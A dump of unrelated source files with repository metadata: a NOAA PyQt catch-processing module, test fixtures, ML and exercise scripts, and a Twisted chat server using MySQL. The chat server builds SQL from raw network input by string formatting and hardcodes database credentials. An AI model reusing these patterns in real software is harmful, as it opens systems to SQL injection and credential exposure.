elif data["type"] == "Mix" or data["type"] == "Submix":
is_mix = "True"
elif data["type"] == "Taxon":
catchContentId = data["catchContentId"]
# Determine if a PARENT_CATCH_ID exists for this record or not
parentCatchId = None
if parent.data(model.getColumnNumber("displayName")).value() != "displayName":
parentCatchId = parent.data(model.getColumnNumber("catchId")).value()
# TODO todd hay - remove MIX_NUMBER from CATCH table - do we need this anymore?
# TODO todd hay - CATCH Table - Drop OPERATION_TYPE_ID
sql = "INSERT INTO CATCH (PARENT_CATCH_ID, CATCH_CONTENT_ID, DISPLAY_NAME, IS_MIX, IS_DEBRIS, OPERATION_ID) " + \
"VALUES(?, ?, ?, ?, ?, ?);"
params = [parentCatchId, catchContentId, displayName, is_mix, is_debris, self._app.state_machine._haul["haul_id"]]
# print('params: ' + str(params))
result = self._db.execute(query=sql, parameters=params)
if result:
catchId = self._db.get_last_rowid()
column = model.getColumnNumber("catchId")
index = model.createIndex(row, column, child)
role = model.getRoleNumber(role_name="catchId")
status = model.setData(index, catchId, role)
@pyqtSlot(QModelIndex)
def remove_tree_item(self, index):
"""
Method to retrieve a FramTreeItem from a FramTreeModel
:param index: QModelIndex - the item to remove
:return: None
"""
if not isinstance(index, QModelIndex):
return
model = self.seModel
# Get the existing catchId from the data - Do before deleting the actual row
item = model.getItem(index)
typeCol = model.getColumnNumber("type")
catchId = item.data(model.getColumnNumber("catchId")).value()
type = item.data(typeCol).value()
if type == "Taxon":
self.speciesCount -= 1
elif type == "Mix":
if isinstance(self._active_mix, QJSValue):
self._active_mix = self._active_mix.toVariant()
if catchId == self._active_mix["catchId"]:
self.activeMix = {"displayName": None, "catchId": None}
# recurse to check all children + subchildren
self.speciesCount -= len([x for x in item.children if x.data(typeCol).value() == "Taxon"])
submixes = [x for x in item.children if x.data(typeCol).value() == "Submix"]
for submix in submixes:
self.speciesCount -= len([x for x in submix.children if x.data(typeCol).value() == "Taxon"])
# If the submix is the activeMix and we're removing the submix, then set the activeMix to None
if submix.data(model.getColumnNumber('catchId')).value() == self._active_mix["catchId"]:
self.activeMix = {"displayName": None, "catchId": None}
elif type == "Submix":
if isinstance(self._active_mix, QJSValue):
self._active_mix = self._active_mix.toVariant()
if catchId == self._active_mix["catchId"]:
self.activeMix = {"displayName": None, "catchId": None}
# recurse to check all children
self.speciesCount -= len([x for x in item.children if x.data(typeCol).value() == "Taxon"])
# Remove the rows
parentIdx = model.parent(index)
status = model.removeRows(index.row(), 1, parentIdx)
# Decrement the species count - this is shown in the upper right corner of the screen
# self.speciesCount -= 1
# Delete from the database
if isinstance(catchId, int):
catch_sql = """
WITH RECURSIVE subcatch(n) AS (
SELECT CATCH_ID FROM CATCH WHERE CATCH_ID = ?
UNION
SELECT c.CATCH_ID FROM CATCH c, subcatch
WHERE c.PARENT_CATCH_ID = subcatch.n
)
DELETE FROM CATCH WHERE CATCH_ID in subcatch;
"""
specimen_sql = """
WITH RECURSIVE subcatch(n) AS (
SELECT CATCH_ID FROM CATCH WHERE CATCH_ID = ?
UNION
SELECT c.CATCH_ID FROM CATCH c, subcatch
WHERE c.PARENT_CATCH_ID = subcatch.n
),
subspecimens(n) AS (
SELECT SPECIMEN_ID FROM SPECIMEN s INNER JOIN CATCH c
ON c.CATCH_ID = s.CATCH_ID WHERE c.CATCH_ID in subcatch
UNION
SELECT s.SPECIMEN_ID FROM SPECIMEN s, subspecimens
WHERE s.PARENT_SPECIMEN_ID = subspecimens.n
)
DELETE FROM SPECIMEN WHERE SPECIMEN_ID IN subspecimens;
"""
params = [catchId, ]
self._db.execute(query=specimen_sql, parameters=params)
self._db.execute(query=catch_sql, parameters=params)
def _get_debris(self):
"""
Method to retrieve all of the debris items from the database. This is used to populate the list of
possibel debris in the ProcessCatchScreen
:return: list - containing the list of debris from CATCH_CONTENT_LU
"""
debris = []
sql = "SELECT * FROM CATCH_CONTENT_VW WHERE TYPE = 'Debris';"
for d in self._db.execute(sql):
new_debris = dict()
new_debris["displayName"] = d[2]
new_debris["weight"] = None
new_debris["count"] = None
new_debris["type"] = d[13]
new_debris["catchContentId"] = d[14]
debris.append(new_debris)
debris = sorted(debris, key=lambda x: x['displayName'].upper())
return debris
def _get_species(self):
"""
Method to retrieve all of the species from the database. This is used to populate the list of
possible species in the ProcessCatchScreen
:return: dictionary containing the species
"""
species = []
# Get all of the FRAM-specific protocols, tied to the TAXONOMY_ID - this is used to update the protocol
# display below as there might be non-FRAM PI's who have a sampling plan for a given TAXONOMY_ID
protocols = self._get_fram_protocols()
# TODO (todd.hay) Get the species-specific protocol information as well
sql = "SELECT * FROM CATCH_CONTENT_VW WHERE TYPE = 'Taxon';"
# sql = "SELECT CONTENTS_ID, SCIENTIFIC_NAME, COMMON_NAME_1, COMMON_NAME_2, COMMON_NAME_3, DISPLAY_NAME, " + \
# "HISTORICAL_DEPTH_MIN, HISTORICAL_DEPTH_MAX, HISTORICAL_LAT_MIN, HISTORICAL_LAT_MAX, IS_MOST_RECENT " + \
# "FROM CATCH_CONTENTS_LU c INNER JOIN TYPES_LU t ON c.CONTENT_TYPE_ID = t.TYPE_ID " + \
# "WHERE t.CATEGORY = 'Content' AND t.TYPE = 'Taxon';"
for s in self._db.execute(sql):
new_species = dict()
new_species["taxonomyId"] = s[0]
new_species["protocol"] = protocols[s[0]] if s[0] in protocols else s[1]
new_species["displayName"] = s[2]
new_species["scientificName"] = s[3]
new_species["commonName1"] = s[4] if s[4] else ""
new_species["commonName2"] = s[5] if s[5] else ""
new_species["commonName3"] = s[6] if s[6] else ""
new_species["weight"] = None
new_species["count"] = None
new_species["depthMin"] = s[7] if s[7] else None
new_species["depthMax"] = s[8] if s[8] else None
new_species["latMin"] = s[9] if s[9] else None
new_species["latMax"] = s[10] if s[10] else None
new_species["isMostRecent"] = s[11] if s[11] else "False"
new_species["isLastNOperations"] = s[12] if s[12] else ""
new_species["type"] = s[13] if s[13] else None
new_species["catchContentId"] = s[14] if s[14] else None
species.append(new_species)
species = sorted(species, key=lambda x: x['displayName'].upper())
return species
@staticmethod
def _set_selected_species_model():
"""
Method that defines the species already selected for the self._activeHaul
:return: FramTreeModel - the model used with the tvSelectedSpecies TreeView
"""
# TODO Need to add sampleType (i.e. fish, salmon, coral - to drive Fish Sampling Screen)
# headers = ["taxonomyId", "displayName", "scientificName",
# "protocol", "weight", "count", "depthMin", "depthMax", "latMin", "latMax",
# "isMostRecent", "isLastNOperations", "type", "sampleType", "catchContentId", "catchId"]
headers = ["taxonomyId", "scientificName", "commonName1", "commonName2", "commonName3", "displayName",
"protocol", "weight", "count", "depthMin", "depthMax", "latMin", "latMax",
"isMostRecent", "isLastNOperations", "type", "sampleType", "catchContentId", "catchId"]
data = []
species_model = SpeciesTreeModel(headers=headers, data=data)
return species_model
@pyqtProperty(QVariant, notify=selectedIndexChanged)
def selectedIndex(self):
"""
Returns the QModelIndex of the currently selected item
:return:
"""
return self._selected_index
@selectedIndex.setter
def selectedIndex(self, value):
# if index is None:
# index = QModelIndex()
if isinstance(value, QJSValue):
value = value.toVariant()
self._selected_index = value
self.selectedIndexChanged.emit()
@pyqtSlot()
def updateWeightCount(self):
"""
Method called when returning from WeighBaskets to update the weights/num basket count of the
selected species
:return:
"""
# Get the update weight/count data
catch_id = self._app.state_machine.species["catch_id"]
results = self._get_basket_weights_counts(catch_id=catch_id)
# logging.info('selectedIndex: {0}'.format(self.selectedIndex))
try:
# Update the model
model = self.seModel
idx = self.selectedIndex["currentIndex"]
item = model.getItem(idx)
row = idx.row()
for x in list(results):
col = model.getColumnNumber(x)
if col != -1:
index = model.createIndex(row, col, item)
value = results[x]
role = model.getRoleNumber(role_name=x)
status = model.setData(index, value, role)
logging.info('{0} = {1}, row: {2}, col: {3}, role: {4}, status: {5}'.
format(x, value, row, col, role, status))
# logging.info('rootData: {0}'.format(model.rootData))
except Exception as ex:
pass
def _get_basket_weights_counts(self, catch_id):
"""
Method to get the total weight + number of baskets for the given catch_id. This is called
by initialize_tree when entering ProcessCatch and by TrawlBackdeckStateMachine when
returning to ProcessCatch from the WeighBaskets screen, so as to update the values for the
currently selected species
:param catch_id: int
:return: dict - contains the "weight" and "count"
"""
if not isinstance(catch_id, int):
return
try:
display_name = Catch.select().where(Catch.catch == catch_id).get().display_name
except DoesNotExist as ex:
display_name = ""
logging.info('Could not find the display name: ' + str(ex))
baskets_sql = """
WITH RECURSIVE subcatch(n) AS (
SELECT c.CATCH_ID FROM CATCH c
WHERE c.CATCH_ID = ?
UNION
SELECT c.CATCH_ID FROM CATCH c, subcatch
WHERE c.PARENT_CATCH_ID = subcatch.n AND c.DISPLAY_NAME = ?
)
select WEIGHT_KG, SAMPLE_COUNT_INT from CATCH c
WHERE c.CATCH_ID in subcatch AND c.RECEPTACLE_SEQ IS NOT NULL
"""
params = [catch_id, display_name]
total_weight = 0
num_baskets = 0
for basket in self._db.execute(query=baskets_sql, parameters=params):
total_weight += basket[0] if basket[0] else 0
num_baskets += 1 if basket[0] else 0
# logging.info('display name: ' + str(display_name) + ', weight: ' + str(total_weight) + ', count: ' + str(num_baskets))
return {"weight": total_weight, "count": num_baskets}
@pyqtSlot(result=QVariant)
def checkSpeciesForData(self):
"""
Method to determine if catch / specimen data has been collected for the species
:return: QVariant - dict - containing counts of baskets + specimens
"""
try:
results = {"baskets": 0, "specimens": 0}
catch_id = self._app.state_machine.species["catch_id"]
baskets_sql = """
WITH RECURSIVE subcatch(n) AS (
SELECT c.CATCH_ID FROM CATCH c
WHERE c.CATCH_ID = ?
UNION
SELECT c.CATCH_ID FROM CATCH c, subcatch
WHERE c.PARENT_CATCH_ID = subcatch.n
)
select count(*) from CATCH c WHERE c.CATCH_ID in subcatch
AND c.RECEPTACLE_SEQ IS NOT NULL
"""
for basket in self._db.execute(query=baskets_sql, parameters=[catch_id,]):
results["baskets"] = basket[0]
specimens_sql = """
WITH RECURSIVE subcatch(n) AS (
SELECT c.CATCH_ID FROM CATCH c WHERE c.CATCH_ID = ?
UNION
SELECT c.CATCH_ID FROM CATCH c, subcatch
WHERE c.PARENT_CATCH_ID = subcatch.n
),
subspecimens(n) AS (
SELECT SPECIMEN_ID FROM SPECIMEN s INNER JOIN CATCH c
ON c.CATCH_ID = s.CATCH_ID WHERE c.CATCH_ID in subcatch
UNION
SELECT s.SPECIMEN_ID FROM SPECIMEN s, subspecimens
WHERE s.PARENT_SPECIMEN_ID = subspecimens.n
)
SELECT count(*) FROM SPECIMEN WHERE SPECIMEN_ID IN subspecimens
AND PARENT_SPECIMEN_ID IS NULL;
"""
for specimen in self._db.execute(query=specimens_sql, parameters=[catch_id,]):
results["specimens"] = specimen[0]
except Exception as ex:
logging.info("Error getting basket and/or specimen counts: " + str(ex))
return {"baskets": -1, "specimens": -1}
return results
@pyqtSlot(result=QVariant)
def get_species_per_haul(self):
"""
Method to return all of the selected species for the self._haul
:return: list of dicts - containing all of the species for the given haul
"""
species = []
sql = "SELECT * FROM CATCH_VW WHERE HAUL_NUMBER = ?;"
sql = "SELECT c.CATCH_ID, c.PARENT_CATCH_ID, c.WEIGHT_KG, " + \
"c.SAMPLE_COUNT_INT, t.SCIENTIFIC_NAME, cc.DISPLAY_NAME " + \
"FROM CATCH c " + \
"INNER JOIN HAULS h ON c.OPERATION_ID = h.HAUL_ID " + \
"INNER JOIN CATCH_CONTENT_LU cc ON cc.CATCH_CONTENT_ID = c.CATCH_CONTENT_ID " + \
"INNER JOIN TAXONOMY_LU t ON cc.TAXONOMY_ID = t.TAXONOMY_ID " + \
"WHERE h.HAUL_ID = ?;"
params = [self._app.state_machine._haul["haul_id"], ]
for s in self._db.execute(query=sql, parameters=params):
new_species = {}
new_species["catch_partition_id"] = s[0]
new_species["parent_id"] = s[1] if s[1] else None
new_species["weight"] = s[2] if s[2] else None
new_species["count"] = s[3] if s[3] else None
new_species["scientific_name"] = s[4] if s[4] else None
new_species["display_name"] = s[5] if s[5] else None
species.append(new_species)
return species
def get_salmon_species(self):
"""
Method to return all of the salmon species. Used to drive the salmon-based FishSamplingScreen
selection in ProcessCatchScreen.qml
:return: list - all of the taxonomyId related to salmon species
"""
salmon = []
sql = "SELECT DISTINCT TAXONOMY_ID FROM SALMON_SPECIES_VW;"
for row in self._db.execute(query=sql):
salmon.append(row[0])
return salmon
def get_coral_species(self):
"""
Method to return all of the coral species. Used to drive the coral-based FishSamplingScreen
selection in ProcessCatchScreen.qml
:return: list - all of the taxonomyId related to salmon species
"""
corals = []
sql = "SELECT DISTINCT TAXONOMY_ID FROM CORAL_SPECIES_VW;"
for row in self._db.execute(query=sql):
corals.append(row[0])
return corals
def get_sponge_species(self):
"""
Method to return all of the sponge speccies. Used to drive the
sponge-based selection in ProcessCatchScreen.qml to push user over to the
SpecialActionsScreen.qml
:return:
"""
sponges = []
sql = "SELECT DISTINCT TAXONOMY_ID FROM SPONGE_SPECIES_VW;"
for row in self._db.execute(query=sql):
sponges.append(row[0])
return sponges
def get_rockfish_species(self):
"""
Method to return all of the rockfish species. Used to drive barcode collection
for Peter Sudmant (UC Berkeley) asking for muscle tissue for any rockfish
during 2019 survey season
:return:
"""
rockfish = []
sql = "SELECT DISTINCT TAXONOMY_ID FROM ROCKFISH_SPECIES_VW;"
for row in self._db.execute(query=sql):
rockfish.append(row[0])
return rockfish
@pyqtSlot(str, int, result=bool)
def checkSpeciesType(self, type, taxonId):
"""
Method to return the listing of the corals, as a pyqtProperty
:return:
"""
if type == "salmon":
return taxonId in self._salmon
elif type == "coral":
return taxonId in self._corals
elif type == "sponge":
return taxonId in self._sponges
elif type == "rockfish":
return taxonId in self._rockfish
# @pyqtSlot(str, str, QModelIndex)
@pyqtSlot()
def renameMixes(self):
"""
Method called by ProcessCatchScreen.qml, in the removeSpecies function when a mix or
a submix is removed from the selected species TreeView. This does not relabel the
items in the TreeView, as that is handled directly by the tree view, however, it does
update the catch.display_name's for all of the mixes and submixes that follow this
provided mix
:param mixType:
:param name:
:param parentIndex:
:return:
"""
# if mixType is None:
# return
#
# if not isinstance(parentIndex, QModelIndex):
# return
try:
logging.info(f"mixes: {self.seModel.mixCount}")
type_col = self.seModel.getColumnNumber("type")
display_name_col = self.seModel.getColumnNumber("displayName")
display_name_role = self.seModel.getRoleNumber(role_name="displayName")
catch_id_col = self.seModel.getColumnNumber("catchId")
catch_id_role = self.seModel.getRoleNumber(role_name="catchId")
mixes = [x for x in self.seModel.rootItem.children
if x.data(column=type_col).value() == "Mix"]
for mix_count, mix in enumerate(mixes):
mix_display_name = mix.data(column=display_name_col).value()
if int(mix_display_name.strip("Mix #")) - 1 != mix_count:
catch_id = mix.data(column=catch_id_col).value()
value = f"Mix #{mix_count+1}"
Catch.update(display_name = value).where(Catch.catch == catch_id).execute()
index = self.seModel.createIndex(mix.row, display_name_col, mix)
self.seModel.setData(index=index, value=value, role=display_name_role)
logging.info(f"mix to update, catch_id: {catch_id}, {mix_display_name} > {value}")
submixes = [x for x in mix.children
if x.data(column=type_col).value() == "Submix"]
for submix_count, submix in enumerate(submixes):
sm_display_name = submix.data(column=display_name_col).value()
if int(sm_display_name.strip("Submix #")) - 1 != submix_count:
catch_id = submix.data(column=catch_id_col).value()
value = f"Submix #{submix_count+1}"
Catch.update(display_name=value).where(Catch.catch == catch_id).execute()
index = self.seModel.createIndex(submix.row, display_name_col, submix)
self.seModel.setData(index=index, value=value, role=display_name_role)
logging.info(f"submix to update, catch_id: {catch_id}, {sm_display_name} > {value}")
except Exception as ex:
logging.error(f"Error renaming the mixes: {ex}")
| [
"will.smith@noaa.gov"
] | will.smith@noaa.gov |
32af9934c3684fece98b2a567b106cb16cc30b4c | 605d63d23bc2e07eb054979a14557d469787877e | /atest/testdata/variables/same_variable_file_names/different_variable_files/suite3/subsuite1/variable.py | 54f1c9224cb5c5536b9cbabadb8493758f6a6413 | [
"Apache-2.0",
"CC-BY-3.0"
] | permissive | robotframework/robotframework | 407b0cdbe0d3bb088f9bfcf9ea7d16e22eee1ddf | cf896995f822f571c33dc5651d51365778b1cf40 | refs/heads/master | 2023-08-29T03:19:00.734810 | 2023-08-27T18:14:48 | 2023-08-28T18:14:11 | 21,273,155 | 8,635 | 2,623 | Apache-2.0 | 2023-09-05T04:58:08 | 2014-06-27T11:10:38 | Python | UTF-8 | Python | false | false | 38 | py | SUITE = SUITE_31 = "suite3.subsuite1"
| [
"peke@iki.fi"
] | peke@iki.fi |
c62e8b82b16c1d7d6bb000b63b61a3cb931b975c | bd02b45c9131379c1059ef8190b3251fe9578c35 | /Part 2 - Regression/Section 8 - Decision Tree Regression/Decision_Tree_Regression/decision_tree_regression.py | 11ab23753385d90828c99ebf2b66d595b95be534 | [] | no_license | katchme88/models | e85b26979d4bb24a4f1657ce2256cdc5d82c9da2 | e81009d37d4cddcc3dc79475118d4ec1babfe87d | refs/heads/master | 2020-06-21T13:17:39.750459 | 2019-07-17T21:14:08 | 2019-07-17T21:14:08 | 197,462,897 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,540 | py | # Decision Tree Regression
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Position_Salaries.csv')
X = dataset.iloc[:, 1:2].values
y = dataset.iloc[:, 2].values
# Splitting the dataset into the Training set and Test set
"""from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)"""
# Feature Scaling
"""from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)"""
# Fitting Decision Tree Regression to the dataset
from sklearn.tree import DecisionTreeRegressor
regressor = DecisionTreeRegressor(random_state = 0)
regressor.fit(X, y)
# Predicting a new result
y_pred = regressor.predict(6.5)
# Visualising the Decision Tree Regression results
plt.scatter(X,y,color='red')
plt.plot(X, regressor.predict(X), color='blue')
plt.title('Truth or Bluff (Decision Tree Regression)')
plt.xlabel('Position Level')
plt.ylabel('Salary')
plt.show()
# Visualising the Decision Tree Regression results (higher resolution)
X_grid = np.arange(min(X), max(X), 0.01)
X_grid = X_grid.reshape((len(X_grid), 1))
plt.scatter(X, y, color = 'red')
plt.plot(X_grid, regressor.predict(X_grid), color = 'blue')
plt.title('Truth or Bluff (Decision Tree Regression)')
plt.xlabel('Position level')
plt.ylabel('Salary')
plt.show() | [
"talha@liveblockauctions.com"
] | talha@liveblockauctions.com |
f13d5c9080a5c0a35528af52c3526818137fe27e | 47386073517c1d5bd0d6e96ded48e0bbb9cdd7a4 | /src/study_cookbook/10模块和包/运行目录或压缩文件.py | 15c8839b803b0f8f296146c8eb820a6d8421bab1 | [] | no_license | halysl/python_module_study_code | f733eba00de75ebd1cdc9c1e9e36f3a7eee03c93 | 189fd3878b0abe68fd56e11357e88facdb4a186f | refs/heads/master | 2022-07-21T06:51:32.129654 | 2021-08-05T09:14:15 | 2021-08-05T09:14:15 | 148,780,484 | 1 | 0 | null | 2022-07-06T20:26:28 | 2018-09-14T11:39:21 | HTML | UTF-8 | Python | false | false | 277 | py | # -*- coding: utf-8 -*-
"""
myapplication/
spam.py
bar.py
grok.py
__main__.py
"""
"""
bash % python3 myapplication
"""
"""
bash % ls
spam.py bar.py grok.py __main__.py
bash % zip -r myapp.zip *.py
bash % python3 myapp.zip
... output from __main__.py ...
"""
| [
"halysl0817@gmail.com"
] | halysl0817@gmail.com |
12bc855aadc0ed74e0322b14d8cacc2223dd6959 | 82f83a3897c940f695d348fd895af9158f331c34 | /lab2.2.py | 0a99eff9225ede162a0c39689deae9f7283871ed | [] | no_license | sTorba24/laboratory1 | 617b80b46de36c91840ebdb60007e584320d64af | a6ec96bd8fbf41004720be60f4c237addb006f9f | refs/heads/master | 2020-09-08T07:24:41.032389 | 2019-11-11T20:46:24 | 2019-11-11T20:46:24 | 221,061,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 916 | py | """2.Дано ціле число N(>1).Вивести найбільше значення із цілих
чисел K , для яких сума 1+2+…+К буде менше або дорівнює N , і
саму цю суму."""
import re
re_integer = re.compile("^[-+]{0,1}\d+$")
def validator(pattern, promt):
text = input(promt)
while not bool(pattern.match(text)):
text = input(promt)
return text
def int_greater_zero_validator(prompt):
number = int(validator(re_integer, prompt))
while number<=0:
number = int(validator(re_integer, prompt))
return number
n = int_greater_zero_validator("Введіть значення N(N>1)\n")
k = 0
s=0
while n>=s:
s=s+k
k=k+1
print(s,k)
print('Цикл завершено')
| [
"noreply@github.com"
] | noreply@github.com |
e21aec5d537bc04c4929f029b1ac0aa67ad21410 | efb4bdb3f1d2b0c87c4b6120a06e03fa28df3b15 | /exercise9/9-2/public/test_library.py | 2ec89620ea73b729be6237e8c7da044b60884177 | [] | no_license | pignuante/ETH | 7ddbee9ea1eaadcc111b9eb30ee84b74b653d7b7 | 5386e424bc1cdb9693228bac80f221bbefc38f12 | refs/heads/main | 2023-01-20T08:16:41.112242 | 2020-12-02T07:39:54 | 2020-12-02T07:39:54 | 315,497,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,412 | py | #!/usr/bin/env python3
from unittest import TestCase
from public.library import Library
from public.movie import Movie
from public.moviebox import MovieBox
class LibraryTest(TestCase):
def test_repr_movie(self):
actual = repr(Movie("T", ["A", "B"], 123))
expected = 'Movie("T", ["A", "B"], 123)'
self.assertEqual(expected, actual)
def test_repr_moviebox(self):
actual = repr(MovieBox("T", [Movie("T2", ["A", "B"], 234)]))
expected = 'MovieBox("T", [Movie("T2", ["A", "B"], 234)])'
self.assertEqual(expected, actual)
def test_library(self):
a = Movie("The Shawshank Redemption", ["Robbins", "Freeman"], 142)
b = Movie("The Godfather", ["Brando", "Pacino"], 175)
c = Movie("12 Angry Men", ["Fonda", "Cobb"], 96)
d = MovieBox("Top Movies", [b, c])
l = Library()
l.add_movie(a)
l.add_movie(d)
self.assertEqual(413, l.get_total_duration())
# This current test suite only contains very basic test cases. By now,
# you have some experience in writing test cases. We strongly encourage
# you to implement further test cases. The additional tests can be run via
# 'Test&Run' in ACCESS. These tests won't affect the grading of your solution
# directly, but they can help you with identifying relevant corner cases
# that you have to consider in your implementation.
| [
"syaoran215@naver.com"
] | syaoran215@naver.com |
2a5148f46a6509ada6a2311abb815eaa87a49e5a | 7bc54bae28eec4b735c05ac7bc40b1a8711bb381 | /src/tlm/data_gen/robust_gen/gen_runner2/pairwise_desc_neg_major.py | 5e2915d046f6499f00a526baceaf2ea5ad156de6 | [] | no_license | clover3/Chair | 755efd4abbd5f3f2fb59e9b1bc6e7bc070b8d05e | a2102ebf826a58efbc479181f1ebb5de21d1e49f | refs/heads/master | 2023-07-20T17:29:42.414170 | 2023-07-18T21:12:46 | 2023-07-18T21:12:46 | 157,024,916 | 0 | 0 | null | 2023-02-16T05:20:37 | 2018-11-10T21:55:29 | Python | UTF-8 | Python | false | false | 678 | py | from functools import partial
from data_generator.job_runner import JobRunner
from epath import job_man_dir
from tlm.data_gen.adhoc_datagen import LeadingN
from tlm.data_gen.robust_gen.robust_generators import RobustPairwiseTrainGen2
from tlm.data_gen.run_robust_gen import RobustWorker
def main():
max_seq_length = 512
encoder = LeadingN(max_seq_length, 1)
worker_factory = partial(RobustWorker,
RobustPairwiseTrainGen2(encoder, max_seq_length, "desc", 1000, "neg_major_enum"))
runner = JobRunner(job_man_dir, 4, "robust_pairwise_head_desc_neg_major", worker_factory)
runner.start()
if __name__ == "__main__":
main()
| [
"lesterny@gmail.com"
] | lesterny@gmail.com |
e28025510dfda22da1bec3ee0cf73ea95800a66f | 91e1abcf2ef0aaa20f3e426d1dfc7d81efcd0b3c | /servers/chat.py | 383babc3f63a653ed5bc0a07aebcd55887aa5fbb | [] | no_license | Ohmfrh/Python-WebSocket | 6272f8dcaf926e22d83a827041511ebf1a85ea83 | e55cbd68632068b635cb84dcc1b85fcfdbecdce4 | refs/heads/master | 2021-01-18T09:57:29.699165 | 2016-05-04T17:16:48 | 2016-05-04T17:16:48 | 44,284,509 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,335 | py | import MySQLdb
from twisted.protocols import basic
from twisted.internet import reactor, protocol
import json
modules = []
class MyChat(basic.LineReceiver):
def connectionMade(self):
self.factory.clients.append(self)
print "Got new client!"
def connectionLost(self, reason):
print "Lost a client!"
self.factory.clients.remove(self)
def lineReceived(self, line):
split = line.split('=')
if line == 'exit':
self.transport.loseConnection()
if split[0] == 'module':
obj = {}
obj['module'] = split[1]
obj['thread'] = self
modules.append(obj)
else:
if len(modules) > 0:
i = 0
for module in modules:
if module['thread'] == self:
print "Encontrado: " + module['module']
break
i += 1
print modules[i]['module']
if modules[i]['module'] == 'RFID':
usrId = databaseQuery(line, modules[i]['module'])
connections = databaseQuery('', 'checkLogged')
if usrId != -1 and connections <= 5:
print usrId
modules[i]['thread'].transport.write('1')
for module in modules:
if module['module'] == 'audio/video':
print "Enviar a misterchanz"
video = databaseQuery(usrId, 'video')
audio = databaseQuery(usrId, 'audio')
user = databaseQuery(usrId, 'user')
print user
persona = {}
data = {}
persona['nombre'] = user['name']
persona['audio'] = audio
persona['img'] = video
data['persona'] = persona
if user['logged'] == '0':
data['accion'] = 'in'
print databaseQuery(usrId, 'login')
elif user['logged'] == '1':
data['accion'] = 'out'
print databaseQuery(usrId, 'logout')
else:
print "????"
json_data = json.dumps(data)
j=0
for module in modules:
if module['module'] == 'audio/video':
databaseQuery(json_data, 'pipeline')
modules[j]['thread'].transport.write(json_data)
break
j += 1
break
else:
print "SEARCHING"
else:
self.transport.write('0')
elif modules[i]['module'] == 'audio/video':
print "De misterchanz"
else:
print "NO MODULES"
def message(self, message):
# data = {}
# data['name'] = 'daniel'
# json_data = json.dumps(data)
# self.transport.write(json_data)
self.transport.write(message)
def databaseQuery(line, module):
db = MySQLdb.connect(host="localhost", user="daniel", passwd="12345", db="aula")
if module == 'RFID':
usrId = -1
query = """SELECT usr.id AS userId FROM usuarios_usersys AS usr
LEFT JOIN identificacion_identify AS id
ON usr.id=id.usersys_id WHERE id.string='%s';""" % (line)
cursor = db.cursor()
cursor.execute(query)
for row in cursor.fetchall():
usrId = row[0]
cursor.close()
db.close()
return usrId
elif module == 'video':
query = """SELECT usr.name, usr.last_names, i.name, i.path, s.address FROM usuarios_usersys AS usr
RIGHT JOIN imagenes_userimage AS ui ON usr.id=ui.user_id LEFT JOIN imagenes_image AS i
ON i.id=ui.image_id LEFT JOIN multimedia_server AS s ON s.id=i.server_id WHERE usr.id=%i;""" % (line)
cursor = db.cursor()
cursor.execute(query)
list = buildJSONDB(cursor, 'video')
db.close()
cursor.close()
return list
elif module == 'audio':
query = """SELECT s.address, a.path, a.name, a.album, a.artist, a.image FROM usuarios_usersys AS usr
RIGHT JOIN musica_usersong AS ua ON usr.id=ua.user_id LEFT JOIN musica_song AS a ON a.id=ua.song_id
LEFT JOIN multimedia_server AS s ON s.id=a.server_id WHERE usr.id=%i""" % (line)
cursor = db.cursor()
cursor.execute(query)
list = buildJSONDB(cursor, 'audio')
cursor.close()
db.close()
return list
elif module == 'user':
obj = {}
query = """SELECT name, last_names, logged FROM usuarios_usersys WHERE id=%i;""" % (line)
cursor = db.cursor()
cursor.execute(query)
for row in cursor.fetchall():
name = row[0] + ' ' + row[1]
logged = row[2]
break
obj['name'] = name
obj['logged'] = logged
cursor.close()
db.close()
return obj
elif module == 'logout':
print "LOGOUT"
query = """UPDATE usuarios_usersys SET logged=0 WHERE id=%i""" % (line)
cursor = db.cursor()
cursor.execute(query)
db.commit()
cursor.close()
db.close()
elif module=='login':
print "LOGIN"
query = """UPDATE usuarios_usersys SET logged=1 WHERE id=%i""" % (line)
cursor = db.cursor()
cursor.execute(query)
db.commit()
cursor.close()
db.close()
elif module == 'checkLogged':
print "IN LOGGED"
count = 0
query = """SELECT COUNT(*) FROM usuarios_usersys WHERE logged='1'"""
cursor = db.cursor()
cursor.execute(query)
for row in cursor.fetchall():
return row[0]
elif module == 'pipeline':
query = """INSERT INTO home_pipeline (pipe) VALUES ('%s')""" % (line)
cursor = db.cursor()
cursor.execute(query)
db.commit()
cursor.close()
db.close()
else:
db.close()
return -1
def buildJSONDB(cursor, module):
obj = {}
list = []
if module == 'video':
for row in cursor.fetchall():
path = 'http://' + row[4] + row[3] + row[2]
list.append(path)
return list
elif module == 'audio':
for row in cursor.fetchall():
list.append({'nombre': row[2], 'src': 'http://' + row[0] + row[1] + row[2], 'artista':row[3],
'album':row[4], 'imagen': row[5]})
print list
return list
factory = protocol.ServerFactory()
factory.protocol = MyChat
factory.clients = []
reactor.listenTCP(9090, factory)
reactor.run()
| [
"dancassig@gmail.com"
] | dancassig@gmail.com |
caeb7a7a1f1adb6c1f1886cc8d8394efc67d7d5c | edfc2f6a7cf90ee0e3acbe68e22512e6b40059ab | /6/6.py | a97fc1dff489d7c34ca8e6685b14ebf9a8afc832 | [] | no_license | tangyao0792/ProjectEular | 43fd9908213cc5a09519ea701928127ea59146b3 | a65d1066c86126968929ed967763a4e69977b128 | refs/heads/master | 2021-01-01T15:40:07.345083 | 2013-01-11T16:04:26 | 2013-01-11T16:04:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 119 | py | sum1 = 0
sum2 = 0
for i in range(1 , 101):
sum1 = sum1 + i*i
sum2 = sum2 + i
sum2 = sum2 * sum2
print sum2 - sum1
| [
"tangyao0792@gmail.com"
] | tangyao0792@gmail.com |
